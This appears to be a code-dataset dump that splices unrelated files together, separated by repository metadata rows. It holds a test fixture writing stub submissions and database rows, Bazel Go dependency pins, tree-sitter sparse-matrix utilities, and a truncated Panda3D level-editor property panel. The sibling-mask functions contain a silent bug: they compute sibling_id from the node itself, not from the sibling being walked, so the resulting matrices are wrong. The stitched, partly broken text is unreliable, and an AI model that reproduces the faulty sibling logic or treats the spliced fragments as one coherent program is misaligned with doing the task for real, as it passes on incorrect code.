t2uuid_ex_path = expectedOutputDir+t2uuid
t3uuid_ex_path = expectedOutputDir+t3uuid
t4uuid_ex_path = expectedOutputDir+t4uuid
t5uuid_ex_path = expectedOutputDir+t5uuid
t6uuid_ex_path = expectedOutputDir+t6uuid
with open(t1_1uuid_ex_path,"w") as fp:
fp.write("et1_1")
with open(t1_2uuid_ex_path,"w") as fp:
fp.write("et1_2")
with open(t1_3uuid_ex_path,"w") as fp:
fp.write("et1_3")
with open(t2uuid_ex_path,"w") as fp:
fp.write("et2")
with open(t3uuid_ex_path,"w") as fp:
fp.write("et3")
with open(t4uuid_ex_path,"w") as fp:
fp.write("et4")
with open(t5uuid_ex_path,"w") as fp:
fp.write("et5")
with open(t6uuid_ex_path,"w") as fp:
fp.write("et6")
# Submission files
p1 = inputDir+student_id+"_"+q1uuid+".c"
p2 = inputDir+student_id+"_"+q2uuid+".cpp"
p3 = inputDir+student_id+"_"+q3uuid+".py"
with open(p1,"w") as fp:
fp.write("""
#include<stdio.h>
int main(){
print("%%s\\n","The C file");
}
""")
fp.close()
with open(p2,"w") as fp:
fp.write("""
#include<iostream>
using namespace std;
int main(){
cout<<"The C++ file";
}
""")
fp.close()
with open(p3,"w") as fp:
fp.write("""
print("The Python file")
""")
fp.close()
db.create_all()
db.session.add(t1)
db.session.add(s1)
db.session.add(c1)
db.session.add(q1)
db.session.add(q2)
db.session.add(q3)
db.session.add(q1l)
db.session.add(q2l)
db.session.add(q3l)
db.session.add(t1_1)
db.session.add(t1_2)
db.session.add(t1_3)
db.session.add(t2)
db.session.add(t3)
db.session.add(t4)
db.session.add(t5)
db.session.add(t6)
db.session.add(cq1)
db.session.add(cs1)
db.session.add(cq2)
db.session.add(cq3)
db.session.add(qt1_1)
db.session.add(qt1_2)
db.session.add(qt1_3)
db.session.add(qt2)
db.session.add(qt3)
db.session.add(qt4)
db.session.add(qt5)
db.session.add(qt6)
#db.session.add(sub1)
#db.session.add(sub2)
#db.session.add(sub3)
#db.session.add(subRes1)
#db.session.add(subRes2)
#db.session.add(subRes3)
db.session.commit()
| 19.417661 | 83 | 0.703663 |
2886242a2051a35fb9cd2ab4ef0604e1b510a8ef | 6,780 | bzl | Python | repositories.bzl | wtzenb/grpc-gateway | d88f9573560a91d26e759852a849e525bf2ec31f | [
"BSD-3-Clause"
] | null | null | null | repositories.bzl | wtzenb/grpc-gateway | d88f9573560a91d26e759852a849e525bf2ec31f | [
"BSD-3-Clause"
] | 7 | 2021-05-11T15:39:59.000Z | 2022-03-02T08:50:30.000Z | api/grpc-gateway/repositories.bzl | chrispaynes/GatewayTodo | 8b775bd4bfe00a6b23014f1b910f3f2cf82e2526 | [
"MIT"
] | null | null | null | load("@bazel_gazelle//:deps.bzl", "go_repository")
def go_repositories():
go_repository(
name = "co_honnef_go_tools",
importpath = "honnef.co/go/tools",
sum = "h1:/hemPrYIhOhy8zYrNj+069zDB68us2sMGsfkFJO0iZs=",
version = "v0.0.0-20190523083050-ea95bdfd59fc",
)
go_repository(
name = "com_github_burntsushi_toml",
importpath = "github.com/BurntSushi/toml",
sum = "h1:WXkYYl6Yr3qBf1K79EBnL4mak0OimBfB0XUf9Vl28OQ=",
version = "v0.3.1",
)
go_repository(
name = "com_github_client9_misspell",
importpath = "github.com/client9/misspell",
sum = "h1:ta993UF76GwbvJcIo3Y68y/M3WxlpEHPWIGDkJYwzJI=",
version = "v0.3.4",
)
go_repository(
name = "com_github_ghodss_yaml",
importpath = "github.com/ghodss/yaml",
sum = "h1:wQHKEahhL6wmXdzwWG11gIVCkOv05bNOh+Rxn0yngAk=",
version = "v1.0.0",
)
go_repository(
name = "com_github_golang_glog",
importpath = "github.com/golang/glog",
sum = "h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58=",
version = "v0.0.0-20160126235308-23def4e6c14b",
)
go_repository(
name = "com_github_golang_mock",
importpath = "github.com/golang/mock",
sum = "h1:G5FRp8JnTd7RQH5kemVNlMeyXQAztQ3mOWV95KxsXH8=",
version = "v1.1.1",
)
go_repository(
name = "com_github_golang_protobuf",
importpath = "github.com/golang/protobuf",
sum = "h1:gyjaxf+svBWX08ZjK86iN9geUJF0H6gp2IRKX6Nf6/I=",
version = "v1.3.3",
)
go_repository(
name = "com_github_rogpeppe_fastuuid",
importpath = "github.com/rogpeppe/fastuuid",
sum = "h1:Ppwyp6VYCF1nvBTXL3trRso7mXMlRrw9ooo375wvi2s=",
version = "v1.2.0",
)
go_repository(
name = "com_google_cloud_go",
importpath = "cloud.google.com/go",
sum = "h1:eOI3/cP2VTU6uZLDYAoic+eyzzB9YyGmJ7eIjl8rOPg=",
version = "v0.34.0",
)
go_repository(
name = "in_gopkg_check_v1",
importpath = "gopkg.in/check.v1",
sum = "h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=",
version = "v0.0.0-20161208181325-20d25e280405",
)
go_repository(
name = "in_gopkg_yaml_v2",
importpath = "gopkg.in/yaml.v2",
sum = "h1:fvjTMHxHEw/mxHbtzPi3JCcKXQRAnQTBRo6YCJSVHKI=",
version = "v2.2.3",
)
go_repository(
name = "org_golang_google_appengine",
importpath = "google.golang.org/appengine",
sum = "h1:/wp5JvzpHIxhs/dumFmF7BXTf3Z+dd4uXta4kVyO508=",
version = "v1.4.0",
)
go_repository(
name = "org_golang_google_genproto",
importpath = "google.golang.org/genproto",
sum = "h1:Bz1qTn2YRWV+9OKJtxHJiQKCiXIdf+kwuKXdt9cBxyU=",
version = "v0.0.0-20200507105951-43844f6eee31",
)
go_repository(
name = "org_golang_google_grpc",
importpath = "google.golang.org/grpc",
sum = "h1:EC2SB8S04d2r73uptxphDSUG+kTKVgjRPF+N3xpxRB4=",
version = "v1.29.1",
)
go_repository(
name = "org_golang_x_lint",
importpath = "golang.org/x/lint",
sum = "h1:XQyxROzUlZH+WIQwySDgnISgOivlhjIEwaQaJEJrrN0=",
version = "v0.0.0-20190313153728-d0100b6bd8b3",
)
go_repository(
name = "org_golang_x_net",
importpath = "golang.org/x/net",
sum = "h1:2mqDk8w/o6UmeUCu5Qiq2y7iMf6anbx+YA8d1JFoFrs=",
version = "v0.0.0-20191002035440-2ec189313ef0",
)
go_repository(
name = "org_golang_x_oauth2",
importpath = "golang.org/x/oauth2",
sum = "h1:TzXSXBo42m9gQenoE3b9BGiEpg5IG2JkU5FkPIawgtw=",
version = "v0.0.0-20200107190931-bf48bf16ab8d",
)
go_repository(
name = "org_golang_x_sync",
importpath = "golang.org/x/sync",
sum = "h1:8gQV6CLnAEikrhgkHFbMAEhagSSnXWGV915qUMm9mrU=",
version = "v0.0.0-20190423024810-112230192c58",
)
go_repository(
name = "org_golang_x_sys",
importpath = "golang.org/x/sys",
sum = "h1:1BGLXjeY4akVXGgbC9HugT3Jv3hCI0z56oJR5vAMgBU=",
version = "v0.0.0-20190215142949-d0b11bdaac8a",
)
go_repository(
name = "org_golang_x_text",
importpath = "golang.org/x/text",
sum = "h1:g61tztE5qeGQ89tm6NTjjM9VPIm088od1l6aSorWRWg=",
version = "v0.3.0",
)
go_repository(
name = "org_golang_x_tools",
importpath = "golang.org/x/tools",
sum = "h1:5Beo0mZN8dRzgrMMkDp0jc8YXQKx9DiJ2k1dkvGsn5A=",
version = "v0.0.0-20190524140312-2c0ae7006135",
)
go_repository(
name = "com_github_google_go_cmp",
importpath = "github.com/google/go-cmp",
sum = "h1:+dTQ8DZQJz0Mb/HjFlkptS1FeQ4cWSnN941F8aEG4SQ=",
version = "v0.2.0",
)
go_repository(
name = "org_golang_x_crypto",
importpath = "golang.org/x/crypto",
sum = "h1:VklqNMn3ovrHsnt90PveolxSbWFaJdECFbxSq0Mqo2M=",
version = "v0.0.0-20190308221718-c2843e01d9a2",
)
go_repository(
name = "org_golang_x_exp",
importpath = "golang.org/x/exp",
sum = "h1:c2HOrn5iMezYjSlGPncknSEr/8x5LELb/ilJbXi9DEA=",
version = "v0.0.0-20190121172915-509febef88a4",
)
go_repository(
name = "com_github_antihax_optional",
importpath = "github.com/antihax/optional",
sum = "h1:uZuxRZCz65cG1o6K/xUqImNcYKtmk9ylqaH0itMSvzA=",
version = "v0.0.0-20180407024304-ca021399b1a6",
)
go_repository(
name = "com_github_census_instrumentation_opencensus_proto",
importpath = "github.com/census-instrumentation/opencensus-proto",
sum = "h1:glEXhBS5PSLLv4IXzLA5yPRVX4bilULVyxxbrfOtDAk=",
version = "v0.2.1",
)
go_repository(
name = "com_github_envoyproxy_go_control_plane",
importpath = "github.com/envoyproxy/go-control-plane",
sum = "h1:rEvIZUSZ3fx39WIi3JkQqQBitGwpELBIYWeBVh6wn+E=",
version = "v0.9.4",
)
go_repository(
name = "com_github_envoyproxy_protoc_gen_validate",
importpath = "github.com/envoyproxy/protoc-gen-validate",
sum = "h1:EQciDnbrYxy13PgWoY8AqoxGiPrpgBZ1R8UNe3ddc+A=",
version = "v0.1.0",
)
go_repository(
name = "com_github_prometheus_client_model",
importpath = "github.com/prometheus/client_model",
sum = "h1:gQz4mCbXsO+nc9n1hCxHcGA3Zx3Eo+UHZoInFGUIXNM=",
version = "v0.0.0-20190812154241-14fe0d1b01d4",
)
go_repository(
name = "com_github_cncf_udpa_go",
importpath = "github.com/cncf/udpa/go",
sum = "h1:WBZRG4aNOuI15bLRrCgN8fCq8E5Xuty6jGbmSNEvSsU=",
version = "v0.0.0-20191209042840-269d4d468f6f",
)
| 36.256684 | 74 | 0.637021 |
09c83abf2349aeb0416fa9cd05503084cc409876 | 3,112 | py | Python | ts_utils/matrix.py | devjeetr/ts_utils | a8bc65ca28be7bbf9ef9ba9509325194aefb1c3a | [
"Apache-2.0"
] | 2 | 2021-12-21T02:49:52.000Z | 2022-03-07T19:40:55.000Z | ts_utils/matrix.py | devjeetr/ts_utils | a8bc65ca28be7bbf9ef9ba9509325194aefb1c3a | [
"Apache-2.0"
] | 1 | 2022-03-07T19:56:24.000Z | 2022-03-07T19:56:24.000Z | ts_utils/matrix.py | devjeetr/ts_utils | a8bc65ca28be7bbf9ef9ba9509325194aefb1c3a | [
"Apache-2.0"
] | null | null | null | """Contains utilities to convert tree_sitter
trees into scipy sparse matrices.
"""
from typing import Tuple
from scipy.sparse import coo_matrix
from tree_sitter import Node, TreeCursor
from ts_utils.core import hash_node
from ts_utils.iter import (TraversalFilter, default_traversal_filter,
iternodes, iternodes_with_parent)
NodesById = dict[int, Tuple[int, Node]]
__all__ = ["parent_mask", "next_sibling_mask", "prev_sibling_mask"]
def parent_mask(cursor: TreeCursor,
nodes: NodesById = None,
traversal_filter: TraversalFilter = default_traversal_filter):
"""Returns a sparse boolean matrix representing an adjacency
matrix of the tree rooted at cursor
"""
if not nodes:
nodes = {
hash_node(node): (i, node)
for i, node in enumerate(
iternodes(cursor, traversal_filter=traversal_filter))
}
data = []
rows = []
cols = []
for node, parent in iternodes_with_parent(
cursor, traversal_filter=traversal_filter):
if parent:
parent_id = nodes[hash_node(parent)][0]
node_id = nodes[hash_node(node)][0]
data.append(1)
rows.append(parent_id)
cols.append(node_id)
return coo_matrix((data, (rows, cols)),
dtype=bool,
shape=(len(nodes), len(nodes)))
def next_sibling_mask(
cursor,
nodes=None,
traversal_filter: TraversalFilter = default_traversal_filter):
if not nodes:
nodes = {
hash_node(node): (i, node)
for i, node in enumerate(
iternodes(cursor, traversal_filter=traversal_filter))
}
data = []
rows = []
cols = []
for node in iternodes(cursor, traversal_filter=traversal_filter):
curr = node
node_id = nodes[hash_node(node)][0]
while curr := curr.next_sibling:
sibling_id = nodes[hash_node(node)][0]
data.append(1)
rows.append(node_id)
cols.append(sibling_id)
return coo_matrix((data, (rows, cols)),
dtype=bool,
shape=(len(nodes), len(nodes)))
def prev_sibling_mask(
cursor,
nodes=None,
traversal_filter: TraversalFilter = default_traversal_filter):
if not nodes:
nodes = {
hash_node(node): (i, node)
for i, node in enumerate(
iternodes(cursor, traversal_filter=traversal_filter))
}
data = []
rows = []
cols = []
for node in iternodes(cursor, traversal_filter=traversal_filter):
curr = node
node_id = nodes[hash_node(node)][0]
while curr := curr.prev_sibling:
sibling_id = nodes[hash_node(node)][0]
data.append(1)
rows.append(node_id)
cols.append(sibling_id)
return coo_matrix((data, (rows, cols)),
dtype=bool,
shape=(len(nodes), len(nodes)))
sparse_adjacency_matrix = parent_mask
| 28.550459 | 78 | 0.586761 |
4b76cb8879031e86d03c4c1c64c854270900ddaf | 25,132 | py | Python | dependencies/panda/direct/leveleditor/ObjectPropertyUI.py | SuperM0use24/Project-Altis | 8dec7518a4d3f902cee261fd522ebebc3c171a42 | [
"Apache-2.0"
] | null | null | null | dependencies/panda/direct/leveleditor/ObjectPropertyUI.py | SuperM0use24/Project-Altis | 8dec7518a4d3f902cee261fd522ebebc3c171a42 | [
"Apache-2.0"
] | null | null | null | dependencies/panda/direct/leveleditor/ObjectPropertyUI.py | SuperM0use24/Project-Altis | 8dec7518a4d3f902cee261fd522ebebc3c171a42 | [
"Apache-2.0"
] | null | null | null | """
UI for object property control
"""
import wx
import os
import math
from wx.lib.embeddedimage import PyEmbeddedImage
from wx.lib.scrolledpanel import ScrolledPanel
from wx.lib.agw.cubecolourdialog import *
from direct.wxwidgets.WxSlider import *
from panda3d.core import *
from . import ObjectGlobals as OG
from . import AnimGlobals as AG
#----------------------------------------------------------------------
Key = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAAA4AAAAOCAIAAACQKrqGAAAAA3NCSVQICAjb4U/gAAABIElE"
"QVQokZWSMW7CQBBFZ2Z3sQ02Ni4sOS6QiLgO5yBXIMcJ1KENje8QLESH7F3FVFQIIS3eTWGJ"
"VE7Iq6Z4+tL8GVRSwmPQg94fKiIOBoNer2et/U1FRER8X6+LonBdFwB4l+p53mq1qqRUUsZx"
"nKYpBwDOuRACEQGgaRoAYETn8/l4PL4uFkqp/X6fZRlnjO12u7KqENEa43keADDGvuo6Go0A"
"wPd9YkxrzY0x4/FYKlXX9eVymc1mjIiIgiD43G4BwFprmgYRubU2DMPnySTw/ev1+pSmRISI"
"SZJ8bDan06ksSyLiQmDXCfr9fp7nb8vldDp9mc9d1/1R27XaClscxzkcDlEUhcOhvt06U1uE"
"EMaYtpbOXlu01vf5Hz/wDRuDdIDl5WtQAAAAAElFTkSuQmCC")
#----------------------------------------------------------------------
class AnimFileDrop(wx.FileDropTarget):
def __init__(self, editor):
wx.FileDropTarget.__init__(self)
self.editor = editor
def OnDropFiles(self, x, y, filenames):
obj = self.editor.objectMgr.findObjectByNodePath(base.direct.selected.last)
if obj is None:
return
objDef = obj[OG.OBJ_DEF]
if not objDef.actor:
return
objNP = obj[OG.OBJ_NP]
for filename in filenames:
name = os.path.basename(filename)
animName = Filename.fromOsSpecific(filename).getFullpath()
if name.endswith('.mb') or\
name.endswith('.ma'):
self.editor.convertMaya(animName, self.editor.ui.protoPaletteUI.addNewItem, obj, isAnim=True)
return
if animName not in objDef.anims:
objDef.anims.append(animName)
objNP.loadAnims({name:animName})
objNP.loop(name)
obj[OG.OBJ_ANIM] = animName
self.editor.ui.objectPropertyUI.updateProps(obj)
class ObjectPropUI(wx.Panel):
"""
Base class for ObjectPropUIs,
It consists of label area and ui area.
"""
def __init__(self, parent, label):
wx.Panel.__init__(self, parent)
self.parent = parent
self.labelPane = wx.Panel(self)
self.label = wx.StaticText(self.labelPane, label=label)
self.labelSizer = wx.BoxSizer(wx.HORIZONTAL)
self.labelSizer.Add(self.label)
bmpKey = Key.GetBitmap()
self.setKeyButton = wx.BitmapButton(self.labelPane, -1, bmpKey, size = (15,15),style = wx.BU_AUTODRAW)
self.labelSizer.Add(self.setKeyButton)
self.labelPane.SetSizer(self.labelSizer)
self.uiPane = wx.Panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.labelPane)
sizer.Add(self.uiPane, 1, wx.EXPAND, 0)
self.SetSizer(sizer)
self.setKeyButton.Bind(wx.EVT_BUTTON, self.onKey)
def onKey(self,evt):
self.parent = wx.GetTopLevelParent(self)
if self.parent.editor.mode == self.parent.editor.ANIM_MODE:
obj= self.parent.editor.objectMgr.findObjectByNodePath(base.direct.selected.last)
objUID = obj[OG.OBJ_UID]
propertyName = self.label.GetLabelText()
value = self.getValue()
frame = self.parent.editor.ui.animUI.curFrame
if (objUID, propertyName) in self.parent.editor.animMgr.keyFramesInfo:
for i in range(len(self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)])):
if self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)][i][AG.FRAME] == frame:
del self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)][i]
self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)].append([frame, value, [], []])
#sort keyFrameInfo list by the order of frame number
sortKeyList = self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)]
for i in range(0, len(sortKeyList)-1):
for j in range(i+1, len(sortKeyList)):
if sortKeyList[i][AG.FRAME]>sortKeyList[j][AG.FRAME]:
temp = sortKeyList[i]
sortKeyList[i] = sortKeyList[j]
sortKeyList[j] = temp
self.parent.editor.animMgr.generateSlope(self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)])
else:
self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)] = [[frame, value, [], []]]
exist = False
for keyFrame in self.parent.editor.animMgr.keyFrames:
if frame == keyFrame:
exist = True
break
if exist == False:
self.parent.editor.animMgr.keyFrames.append(frame)
self.parent.editor.ui.animUI.OnPropKey()
else:
self.parent.editor.ui.animUI.OnPropKey()
else:
evt.Skip()
def setValue(self, value):
self.ui.SetValue(value)
def getValue(self):
return self.ui.GetValue()
def bindFunc(self, inFunc, outFunc, valFunc = None):
self.ui.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.ui.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
if valFunc:
self.ui.Bind(self.eventType, valFunc)
class ObjectPropUIEntry(ObjectPropUI):
""" UI for string value properties """
def __init__(self, parent, label):
ObjectPropUI.__init__(self, parent, label)
self.ui = wx.TextCtrl(self.uiPane, -1)
self.eventType = wx.EVT_TEXT_ENTER
self.Layout()
def setValue(self, value):
self.ui.SetValue(str(value))
class ObjectPropUISlider(ObjectPropUI):
""" UI for float value properties """
def __init__(self, parent, label, value, minValue, maxValue):
ObjectPropUI.__init__(self, parent, label)
self.ui = WxSlider(self.uiPane, -1, value, minValue, maxValue,
pos = (0,0), size=(140, -1),
style=wx.SL_HORIZONTAL | wx.SL_LABELS)
self.ui.Enable()
self.Layout()
def bindFunc(self, inFunc, outFunc, valFunc = None):
self.ui.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.ui.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
self.ui.textValue.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.ui.textValue.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
if valFunc:
self.ui.bindFunc(valFunc)
class ObjectPropUISpinner(ObjectPropUI):
""" UI for int value properties """
def __init__(self, parent, label, value, minValue, maxValue):
ObjectPropUI.__init__(self, parent, label)
self.ui = wx.SpinCtrl(self.uiPane, -1, "", min=minValue, max=maxValue, initial=value)
self.eventType = wx.EVT_SPIN
self.Layout()
class ObjectPropUICheck(ObjectPropUI):
def __init__(self, parent, label, value):
ObjectPropUI.__init__(self, parent, label)
self.ui = wx.CheckBox(self.uiPane, -1, "", size=(50, 30))
self.setValue(value)
self.eventType = wx.EVT_CHECKBOX
self.Layout()
class ObjectPropUIRadio(ObjectPropUI):
def __init__(self, parent, label, value, valueList):
ObjectPropUI.__init__(self, parent, label)
self.ui = wx.RadioBox(self.uiPane, -1, "", choices=valueList, majorDimension=1, style=wx.RA_SPECIFY_COLS)
self.setValue(value)
self.eventType = wx.EVT_RADIOBOX
self.Layout()
def setValue(self, value):
self.ui.SetStringSelection(value)
def getValue(self):
return self.ui.GetStringSelection()
class ObjectPropUICombo(ObjectPropUI):
def __init__(self, parent, label, value, valueList, obj=None, callBack=None):
ObjectPropUI.__init__(self, parent, label)
self.ui = wx.Choice(self.uiPane, -1, choices=valueList)
if callBack is not None:
button = wx.Button(self.labelPane, -1, 'Update', size = (100, 18))
button.Bind(wx.EVT_BUTTON, lambda p0=None, p1=obj, p2=self: callBack(p0, p1, p2))
self.labelSizer.Add(button)
self.setValue(value)
self.eventType = wx.EVT_CHOICE
self.Layout()
def setValue(self, value):
self.ui.SetStringSelection(value)
def getValue(self):
return self.ui.GetStringSelection()
def setItems(self, valueList):
self.ui.SetItems(valueList)
class ObjectPropUITime(wx.Panel):
def __init__(self, parent, label, value):
wx.Panel.__init__(self, parent)
self.parent = parent
self.labelPane = wx.Panel(self)
self.label = wx.StaticText(self.labelPane, label=label)
self.labelSizer = wx.BoxSizer(wx.HORIZONTAL)
self.labelSizer.Add(self.label)
self.labelPane.SetSizer(self.labelSizer)
self.uiPane = wx.Panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.labelPane)
sizer.Add(self.uiPane, 1, wx.EXPAND, 0)
self.SetSizer(sizer)
hSizer = wx.BoxSizer(wx.HORIZONTAL)
self.uiAmPm = wx.Choice(self.uiPane, -1, choices=['AM', 'PM'])
self.uiHour = wx.Choice(self.uiPane, -1, choices=[str(x) for x in range(1, 13)])
self.uiMin = wx.Choice(self.uiPane, -1, choices=[str(x) for x in range(0, 60, 15)])
hSizer.Add(self.uiAmPm)
hSizer.Add(self.uiHour)
hSizer.Add(self.uiMin)
self.uiPane.SetSizer(hSizer)
self.setValue(value)
self.eventType = wx.EVT_CHOICE
self.Layout()
def setValue(self, value):
hourVal = int(math.floor(value))
minVal = [0, 15, 30, 45][int((value - hourVal) * 4)]
if hourVal > 11:
ampmStr = 'PM'
hourVal = hourVal - 12
else:
ampmStr = 'AM'
if hourVal == 0:
hourVal = 12
self.uiAmPm.SetStringSelection(ampmStr)
self.uiHour.SetStringSelection(str(hourVal))
self.uiMin.SetStringSelection(str(minVal))
def getValue(self):
ampmStr = self.uiAmPm.GetStringSelection()
hourVal = int(self.uiHour.GetStringSelection())
if hourVal == 12:
hourVal = 0
if ampmStr == 'PM':
hourVal += 12
minVal = float(self.uiMin.GetStringSelection())
value = float(hourVal) + minVal / 60.0
return value
def bindFunc(self, inFunc, outFunc, valFunc = None):
self.uiAmPm.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.uiAmPm.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
self.uiHour.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.uiHour.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
self.uiMin.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.uiMin.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
if valFunc:
self.uiAmPm.Bind(self.eventType, valFunc)
self.uiHour.Bind(self.eventType, valFunc)
self.uiMin.Bind(self.eventType, valFunc)
class ColorPicker(CubeColourDialog):
def __init__(self, parent, colourData=None, style=CCD_SHOW_ALPHA, alpha = 255, updateCB=None, exitCB=None):
self.updateCB=updateCB
CubeColourDialog.__init__(self, parent, colourData, style)
self.okButton.Hide()
self.cancelButton.Hide()
self._colour.alpha = alpha
self.alphaSpin.SetValue(self._colour.alpha)
self.DrawAlpha()
if exitCB:
self.Bind(wx.EVT_CLOSE, exitCB)
def SetPanelColours(self):
self.oldColourPanel.RefreshColour(self._oldColour)
self.newColourPanel.RefreshColour(self._colour)
if self.updateCB:
self.updateCB(self._colour.r, self._colour.g, self._colour.b, self._colour.alpha)
class ObjectPropertyUI(ScrolledPanel):
def __init__(self, parent, editor):
self.editor = editor
self.colorPicker = None
self.lastColorPickerPos = None
self.lastPropTab = None
ScrolledPanel.__init__(self, parent)
parentSizer = wx.BoxSizer(wx.VERTICAL)
parentSizer.Add(self, 1, wx.EXPAND, 0)
parent.SetSizer(parentSizer); parent.Layout()
self.SetDropTarget(AnimFileDrop(self.editor))
def clearPropUI(self):
sizer = self.GetSizer()
if sizer is not None:
self.lastPropTab = self.nb.GetCurrentPage().GetName()
sizer.Remove(self.propPane)
self.propPane.Destroy()
self.SetSizer(None)
self.Layout()
self.SetupScrolling(self, scroll_y = True, rate_y = 20)
def colorPickerExitCB(self, evt=None):
self.lastColorPickerPos = self.colorPicker.GetPosition()
self.colorPicker.Destroy()
self.colorPicker = None
def colorPickerUpdateCB(self, rr, gg, bb, aa):
r = rr / 255.0
g = gg / 255.0
b = bb / 255.0
a = aa / 255.0
self.propCR.setValue(r)
self.propCG.setValue(g)
self.propCB.setValue(b)
self.propCA.setValue(a)
self.editor.objectMgr.updateObjectColor(r, g, b, a)
def onColorSlider(self, evt):
r = float(self.editor.ui.objectPropertyUI.propCR.getValue())
g = float(self.editor.ui.objectPropertyUI.propCG.getValue())
b = float(self.editor.ui.objectPropertyUI.propCB.getValue())
a = float(self.editor.ui.objectPropertyUI.propCA.getValue())
if self.colorPicker:
evtObj = evt.GetEventObject()
if evtObj == self.propCR.ui or\
evtObj == self.propCR.ui.textValue:
self.colorPicker.redSpin.SetValue(r * 255)
self.colorPicker.AssignColourValue('r', r * 255, 255, 0)
elif evtObj == self.propCG.ui or\
evtObj == self.propCG.ui.textValue:
self.colorPicker.greenSpin.SetValue(g * 255)
self.colorPicker.AssignColourValue('g', g * 255, 255, 0)
elif evtObj == self.propCB.ui or\
evtObj == self.propCB.ui.textValue:
self.colorPicker.blueSpin.SetValue(b * 255)
self.colorPicker.AssignColourValue('b', b * 255, 255, 0)
else:
self.colorPicker._colour.alpha = a * 255
self.colorPicker.alphaSpin.SetValue(self.colorPicker._colour.alpha)
self.colorPicker.DrawAlpha()
self.editor.objectMgr.updateObjectColor(r, g, b, a)
def openColorPicker(self, evt, colourData, alpha):
if self.colorPicker:
self.lastColorPickerPos = self.colorPicker.GetPosition()
self.colorPicker.Destroy()
self.colorPicker = ColorPicker(self, colourData, alpha=alpha, updateCB=self.colorPickerUpdateCB, exitCB=self.colorPickerExitCB)
self.colorPicker.GetColourData().SetChooseFull(True)
self.colorPicker.Show()
if self.lastColorPickerPos:
self.colorPicker.SetPosition(self.lastColorPickerPos)
def updateProps(self, obj, movable=True):
self.clearPropUI()
self.propPane = wx.Panel(self)
mainSizer = wx.BoxSizer(wx.VERTICAL)
mainSizer.Add(self.propPane, 1, wx.EXPAND, 0)
self.SetSizer(mainSizer)
self.nb = wx.Notebook(self.propPane, style=wx.NB_BOTTOM)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.nb, 1, wx.EXPAND)
self.propPane.SetSizer(sizer)
self.transformPane = wx.Panel(self.nb, -1, name='Transform')
self.nb.AddPage(self.transformPane, 'Transform')
self.propX = ObjectPropUIEntry(self.transformPane, 'X')
self.propY = ObjectPropUIEntry(self.transformPane, 'Y')
self.propZ = ObjectPropUIEntry(self.transformPane, 'Z')
self.propH = ObjectPropUISlider(self.transformPane, 'H', 0, 0, 360)
self.propP = ObjectPropUISlider(self.transformPane, 'P', 0, 0, 360)
self.propR = ObjectPropUISlider(self.transformPane, 'R', 0, 0, 360)
self.propSX = ObjectPropUIEntry(self.transformPane, 'SX')
self.propSY = ObjectPropUIEntry(self.transformPane, 'SY')
self.propSZ = ObjectPropUIEntry(self.transformPane, 'SZ')
transformProps = [self.propX, self.propY, self.propZ, self.propH, self.propP, self.propR,
self.propSX, self.propSY, self.propSZ]
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.AddMany(transformProps)
self.transformPane.SetSizer(sizer)
for transformProp in transformProps:
transformProp.bindFunc(self.editor.objectMgr.onEnterObjectPropUI,
self.editor.objectMgr.onLeaveObjectPropUI,
self.editor.objectMgr.updateObjectTransform)
if not movable:
for transformProp in transformProps:
transformProp.ui.Disable()
self.lookPane = wx.Panel(self.nb, -1, name='Look')
self.nb.AddPage(self.lookPane, 'Look')
objNP = obj[OG.OBJ_NP]
objRGBA = obj[OG.OBJ_RGBA]
self.propCR = ObjectPropUISlider(self.lookPane, 'CR', objRGBA[0], 0, 1)
self.propCG = ObjectPropUISlider(self.lookPane, 'CG', objRGBA[1], 0, 1)
self.propCB = ObjectPropUISlider(self.lookPane, 'CB', objRGBA[2], 0, 1)
self.propCA = ObjectPropUISlider(self.lookPane, 'CA', objRGBA[3], 0, 1)
colorProps = [self.propCR, self.propCG, self.propCB, self.propCA]
for colorProp in colorProps:
colorProp.ui.bindFunc(self.onColorSlider)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.AddMany(colorProps)
button = wx.Button(self.lookPane, -1, 'Color Picker', (0,0), (140, 20))
_colourData = wx.ColourData()
_colourData.SetColour(wx.Colour(objRGBA[0] * 255, objRGBA[1] * 255, objRGBA[2] * 255))
button.Bind(wx.EVT_BUTTON, lambda p0=None, p1=_colourData, p2=objRGBA[3] * 255: self.openColorPicker(p0, p1, p2))
sizer.Add(button)
if self.colorPicker:
self.openColorPicker(None, _colourData, objRGBA[3] * 255)
objDef = obj[OG.OBJ_DEF]
if objDef.updateModelFunction is not None or (objDef.model is not None and len(objDef.models) > 0):
defaultModel = obj[OG.OBJ_MODEL]
if defaultModel is None:
defaultModel = ''
if len(objDef.models) == 0:
modelList = ''
else:
modelList = objDef.models
propUI = ObjectPropUICombo(self.lookPane, 'model', defaultModel, modelList, obj, callBack=objDef.updateModelFunction)
sizer.Add(propUI)
propUI.bindFunc(self.editor.objectMgr.onEnterObjectPropUI,
self.editor.objectMgr.onLeaveObjectPropUI,
lambda p0=None, p1=obj: self.editor.objectMgr.updateObjectModelFromUI(p0, p1))
animList = objDef.animDict.get(obj[OG.OBJ_MODEL])
if len(objDef.anims) > 0 or animList:
if animList is None:
animList = objDef.anims
propUI = ObjectPropUICombo(self.lookPane, 'anim', obj[OG.OBJ_ANIM], animList)
sizer.Add(propUI)
